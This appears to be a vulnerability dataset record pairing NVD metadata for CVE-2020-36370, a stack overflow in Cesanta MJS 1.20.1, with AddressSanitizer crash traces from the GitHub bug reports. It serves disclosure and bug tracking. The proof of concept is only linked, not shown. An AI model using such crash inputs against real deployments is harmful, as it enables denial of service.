/home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12193:11 #129 0x59462f in parse_block /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12204:9 #130 0x588dda in parse_statement /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12914:14 #131 0x57f914 in parse_statement_list /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12193:11 #132 0x59462f in parse_block /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12204:9 #133 0x588dda in parse_statement /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12914:14 #134 0x57f914 in parse_statement_list /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12193:11 #135 0x59462f in parse_block /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12204:9 #136 0x588dda in parse_statement /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12914:14 #137 0x57f914 in parse_statement_list /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12193:11 #138 0x59462f in parse_block /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12204:9 #139 0x588dda in parse_statement /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12914:14 #140 0x57f914 in parse_statement_list /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12193:11 #141 0x59462f in parse_block /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12204:9 #142 0x588dda in parse_statement /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12914:14 #143 0x57f914 in parse_statement_list /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12193:11 #144 0x59462f in parse_block /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12204:9 #145 0x588dda in parse_statement /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12914:14 #146 0x57f914 in parse_statement_list /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12193:11 #147 0x59462f in parse_block /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12204:9 #148 0x588dda in parse_statement /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12914:14 #149 0x57f914 in parse_statement_list /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12193:11 #150 0x59462f in parse_block /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12204:9 #151 0x588dda in parse_statement /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12914:14 #152 0x57f914 in parse_statement_list /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12193:11 #153 0x59462f in parse_block /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12204:9 #154 0x588dda in parse_statement /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12914:14 #155 0x57f914 in parse_statement_list /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12193:11 #156 0x59462f in parse_block /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12204:9 #157 0x588dda in parse_statement /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12914:14 #158 0x57f914 in parse_statement_list /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12193:11 #159 0x59462f in parse_block /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12204:9 #160 0x588dda in parse_statement /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12914:14 #161 0x57f914 in parse_statement_list /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12193:11 #162 0x59462f in parse_block /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12204:9 #163 0x588dda in parse_statement /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12914:14 #164 0x57f914 in parse_statement_list /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12193:11 #165 0x59462f in parse_block /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12204:9 #166 0x588dda in parse_statement /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12914:14 #167 0x57f914 in parse_statement_list /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12193:11 #168 0x59462f in parse_block /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12204:9 #169 0x588dda in parse_statement /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12914:14 #170 0x57f914 in parse_statement_list /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12193:11 #171 0x59462f in parse_block /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12204:9 #172 0x588dda in parse_statement /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12914:14 #173 0x57f914 in parse_statement_list /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12193:11 #174 0x59462f in parse_block /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12204:9 #175 0x588dda in parse_statement /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12914:14 #176 0x57f914 in parse_statement_list /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12193:11 #177 0x59462f in parse_block /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12204:9 #178 0x588dda in parse_statement /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12914:14 #179 0x57f914 in parse_statement_list /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12193:11 #180 0x59462f in parse_block /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12204:9 #181 0x588dda in parse_statement /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12914:14 #182 0x57f914 in parse_statement_list /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12193:11 #183 0x59462f in parse_block /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12204:9 #184 0x588dda in parse_statement /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12914:14 #185 0x57f914 in parse_statement_list /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12193:11 #186 0x59462f in parse_block /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12204:9 #187 0x588dda in parse_statement /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12914:14 #188 0x57f914 in parse_statement_list /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12193:11 #189 0x59462f in parse_block /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12204:9 #190 0x588dda in parse_statement /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12914:14 #191 0x57f914 in parse_statement_list /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12193:11 #192 0x59462f in parse_block /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12204:9 #193 0x588dda in parse_statement /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12914:14 #194 0x57f914 in parse_statement_list /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12193:11 #195 0x59462f in parse_block /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12204:9 #196 0x588dda in parse_statement /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12914:14 #197 0x57f914 in parse_statement_list /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12193:11 #198 0x59462f in parse_block /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12204:9 #199 0x588dda in parse_statement /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12914:14 #200 0x57f914 in parse_statement_list /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12193:11 #201 0x59462f in parse_block /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12204:9 #202 0x588dda in parse_statement /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12914:14 #203 0x57f914 in parse_statement_list /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12193:11 #204 0x59462f in parse_block /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12204:9 #205 0x588dda in parse_statement /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12914:14 #206 0x57f914 in parse_statement_list /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12193:11 #207 0x59462f in parse_block /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12204:9 #208 0x588dda in parse_statement /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12914:14 #209 0x57f914 in parse_statement_list /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12193:11 #210 0x59462f in parse_block /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12204:9 #211 0x588dda in parse_statement /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12914:14 #212 0x57f914 in parse_statement_list /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12193:11 #213 0x59462f in parse_block /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12204:9 #214 0x588dda in parse_statement /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12914:14 #215 0x57f914 in parse_statement_list /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12193:11 #216 0x59462f in parse_block /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12204:9 #217 0x588dda in parse_statement /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12914:14 #218 0x57f914 in parse_statement_list /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12193:11 #219 0x59462f in parse_block /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12204:9 #220 0x588dda in parse_statement /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12914:14 #221 0x57f914 in parse_statement_list /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12193:11 #222 0x59462f in parse_block /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12204:9 #223 0x588dda in parse_statement /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12914:14 #224 0x57f914 in parse_statement_list /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12193:11 #225 0x59462f in parse_block /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12204:9 #226 0x588dda in parse_statement /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12914:14 #227 0x57f914 in parse_statement_list /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12193:11 #228 0x59462f in parse_block /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12204:9 #229 0x588dda in parse_statement /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12914:14 #230 0x57f914 in parse_statement_list /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12193:11 #231 0x59462f in parse_block /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12204:9 #232 0x588dda in parse_statement /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12914:14 #233 0x57f914 in parse_statement_list /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12193:11 #234 0x59462f in parse_block /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12204:9 #235 0x588dda in parse_statement /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12914:14 #236 0x57f914 in parse_statement_list /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12193:11 #237 0x59462f in parse_block /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12204:9 #238 0x588dda in parse_statement /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12914:14 #239 0x57f914 in parse_statement_list /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12193:11 #240 0x59462f in parse_block /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12204:9 #241 0x588dda in parse_statement /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12914:14 #242 0x57f914 in parse_statement_list /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12193:11 #243 0x59462f in parse_block /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12204:9 #244 0x588dda in parse_statement /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12914:14 #245 0x57f914 in parse_statement_list /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12193:11 #246 0x59462f in parse_block /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12204:9 #247 0x588dda in parse_statement /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12914:14 #248 0x57f914 in parse_statement_list /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12193:11 #249 0x59462f in parse_block /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12204:9 #250 0x588dda in parse_statement /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12914:14 SUMMARY: AddressSanitizer: stack-overflow /home/hjwang/Tools/llvm-6.0.1/projects/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cc:31 in __asan_memmove ==22443==ABORTING ```
AddressSanitizer: stack-overflow on recursive stack frames: parse_block, parse_statement, parse_statement_list
https://api.github.com/repos/cesanta/mjs/issues/135/comments
1
2019-05-28T07:23:36Z
2019-05-31T12:47:42Z
https://github.com/cesanta/mjs/issues/135
449,103,722
135
2,006
CVE-2020-36370
2021-05-28T21:15:08.470
Stack overflow vulnerability in parse_unary Cesanta MJS 1.20.1, allows remote attackers to cause a Denial of Service (DoS) via a crafted file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/136" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/cesanta/mjs/issues/136" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cesanta:mjs:1.20.1:*:*:*:*:*:*:*", "matchCriteriaId": "22E31949-CED4-4383-B68C-5913872BA53A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "674" ]
674
https://github.com/cesanta/mjs/issues/136
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "cesanta", "mjs" ]
POC: [POC.zip](https://github.com/cesanta/mjs/files/3226091/POC.zip) ``` AddressSanitizer:DEADLYSIGNAL ================================================================= ==23779==ERROR: AddressSanitizer: stack-overflow on address 0x7ffcd8b22f68 (pc 0x0000005a63b8 bp 0x7ffcd8b23110 sp 0x7ffcd8b22f68 T0) #0 0x5a63b7 in findtok /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12117:25 #1 0x5a63b7 in parse_unary /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12426 #2 0x5a5a6e in parse_mul_div_rem /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12446:3 #3 0x5a5236 in parse_plus_minus /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12451:3 #4 0x5a4b00 in parse_shifts /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12456:3 #5 0x5a441e in parse_comparison /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12460:3 #6 0x5a3c4f in parse_equality /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12464:3 #7 0x5a24ab in parse_bitwise_and /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12469:3 #8 0x5a0bec in parse_bitwise_xor /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12474:3 #9 0x59f1ab in parse_bitwise_or /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12479:3 #10 0x59d944 in parse_logical_and /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12484:3 #11 0x59c593 in parse_logical_or /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12489:3 #12 0x59a5f1 in parse_ternary /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12494:14 #13 0x599c92 in parse_assignment /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12532:3 #14 0x5acfb4 in parse_expr /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12536:10 #15 0x5acfb4 in parse_array_literal /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12294 #16 0x5a7a58 in parse_literal /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12354:13 #17 0x5a7a58 in parse_call_dot_mem /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12380 #18 0x5a6400 in parse_postfix /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12414:14 #19 0x5a6400 in parse_unary /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12433 #20 0x5a5a6e in parse_mul_div_rem /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12446:3 #21 0x5a5236 in parse_plus_minus /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12451:3 #22 0x5a4b00 in parse_shifts /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12456:3 #23 0x5a441e in parse_comparison /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12460:3 #24 0x5a3c4f in parse_equality /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12464:3 #25 0x5a24ab in parse_bitwise_and /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12469:3 #26 0x5a0bec in parse_bitwise_xor /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12474:3 #27 0x59f1ab in parse_bitwise_or /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12479:3 #28 0x59d944 in parse_logical_and /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12484:3 #29 0x59c593 in parse_logical_or /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12489:3 #30 0x59a5f1 in parse_ternary /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12494:14 #31 0x599c92 in parse_assignment /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12532:3 #32 0x5acfb4 in parse_expr /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12536:10 #33 0x5acfb4 in parse_array_literal /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12294 #34 0x5a7a58 in parse_literal /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12354:13 #35 0x5a7a58 in parse_call_dot_mem /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12380 #36 0x5a6400 in parse_postfix /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12414:14 #37 0x5a6400 in parse_unary /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12433 #38 0x5a5a6e in parse_mul_div_rem /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12446:3 #39 0x5a5236 in parse_plus_minus /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12451:3 #40 0x5a4b00 in parse_shifts /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12456:3 #41 0x5a441e in parse_comparison /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12460:3 #42 0x5a3c4f in parse_equality /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12464:3 #43 0x5a24ab in parse_bitwise_and /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12469:3 #44 0x5a0bec in parse_bitwise_xor /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12474:3 #45 0x59f1ab in parse_bitwise_or /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12479:3 #46 0x59d944 in parse_logical_and /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12484:3 #47 0x59c593 in parse_logical_or /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12489:3 #48 0x59a5f1 in parse_ternary /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12494:14 #49 0x599c92 in parse_assignment /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12532:3 #50 0x5acfb4 in parse_expr /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12536:10 #51 0x5acfb4 in parse_array_literal /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12294 #52 0x5a7a58 in parse_literal /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12354:13 #53 0x5a7a58 in parse_call_dot_mem /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12380 #54 0x5a6400 in parse_postfix /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12414:14 #55 0x5a6400 in parse_unary /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12433 #56 0x5a5a6e in parse_mul_div_rem /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12446:3 #57 0x5a5236 in parse_plus_minus /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12451:3 #58 0x5a4b00 in parse_shifts /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12456:3 #59 0x5a441e in parse_comparison /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12460:3 #60 0x5a3c4f in parse_equality /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12464:3 #61 0x5a24ab in parse_bitwise_and /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12469:3 #62 0x5a0bec in parse_bitwise_xor /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12474:3 #63 0x59f1ab in parse_bitwise_or /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12479:3 #64 0x59d944 in parse_logical_and /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12484:3 #65 0x59c593 in parse_logical_or /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12489:3 #66 0x59a5f1 in parse_ternary /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12494:14 #67 0x599c92 in parse_assignment /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12532:3 #68 0x5acfb4 in parse_expr /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12536:10 #69 0x5acfb4 in parse_array_literal /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12294 #70 0x5a7a58 in parse_literal /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12354:13 #71 0x5a7a58 in parse_call_dot_mem /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12380 #72 0x5a6400 in parse_postfix /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12414:14 #73 0x5a6400 in parse_unary /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12433 #74 0x5a5a6e in parse_mul_div_rem /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12446:3 #75 0x5a5236 in parse_plus_minus /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12451:3 #76 0x5a4b00 in parse_shifts /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12456:3 #77 0x5a441e in parse_comparison /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12460:3 #78 0x5a3c4f in parse_equality /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12464:3 #79 0x5a24ab in parse_bitwise_and /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12469:3 #80 0x5a0bec in parse_bitwise_xor /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12474:3 #81 0x59f1ab in parse_bitwise_or /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12479:3 #82 0x59d944 in parse_logical_and /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12484:3 #83 0x59c593 in parse_logical_or /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12489:3 #84 0x59a5f1 in parse_ternary /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12494:14 #85 0x599c92 in parse_assignment /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12532:3 #86 0x5acfb4 in parse_expr /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12536:10 #87 0x5acfb4 in parse_array_literal /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12294 #88 0x5a7a58 in parse_literal /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12354:13 #89 0x5a7a58 in parse_call_dot_mem /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12380 #90 0x5a6400 in parse_postfix /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12414:14 #91 0x5a6400 in parse_unary /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12433 #92 0x5a5a6e in parse_mul_div_rem /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12446:3 #93 0x5a5236 in parse_plus_minus /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12451:3 #94 0x5a4b00 in parse_shifts /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12456:3 #95 0x5a441e in parse_comparison /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12460:3 #96 0x5a3c4f in parse_equality /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12464:3 #97 0x5a24ab in parse_bitwise_and /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12469:3 #98 0x5a0bec in parse_bitwise_xor /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12474:3 #99 0x59f1ab in parse_bitwise_or /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12479:3 #100 0x59d944 in parse_logical_and /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12484:3 #101 0x59c593 in parse_logical_or /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12489:3 #102 0x59a5f1 in parse_ternary /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12494:14 #103 0x599c92 in parse_assignment /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12532:3 #104 0x5acfb4 in parse_expr /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12536:10 #105 0x5acfb4 in parse_array_literal /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12294 #106 0x5a7a58 in parse_literal /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12354:13 #107 0x5a7a58 in parse_call_dot_mem /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12380 #108 0x5a6400 in parse_postfix /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12414:14 #109 0x5a6400 in parse_unary /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12433 #110 0x5a5a6e in parse_mul_div_rem /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12446:3 #111 0x5a5236 in parse_plus_minus /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12451:3 #112 0x5a4b00 in parse_shifts /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12456:3 #113 0x5a441e in parse_comparison /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12460:3 #114 0x5a3c4f in parse_equality /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12464:3 #115 0x5a24ab in parse_bitwise_and /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12469:3 #116 0x5a0bec in parse_bitwise_xor /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12474:3 #117 0x59f1ab in parse_bitwise_or /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12479:3 #118 0x59d944 in parse_logical_and /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12484:3 #119 0x59c593 in parse_logical_or /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12489:3 #120 0x59a5f1 in parse_ternary /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12494:14 #121 0x599c92 in parse_assignment /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12532:3 #122 0x5acfb4 in parse_expr /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12536:10 #123 0x5acfb4 in parse_array_literal /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12294 #124 0x5a7a58 in parse_literal /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12354:13 #125 0x5a7a58 in parse_call_dot_mem /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12380 #126 0x5a6400 in parse_postfix /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12414:14 #127 0x5a6400 in parse_unary /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12433 #128 0x5a5a6e in parse_mul_div_rem /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12446:3 #129 0x5a5236 in parse_plus_minus /home/hjwang/UAF_Objects/mjs_afl_asan/mjs.c:12451:3 #130 0x5a4b00 in parse_shifts 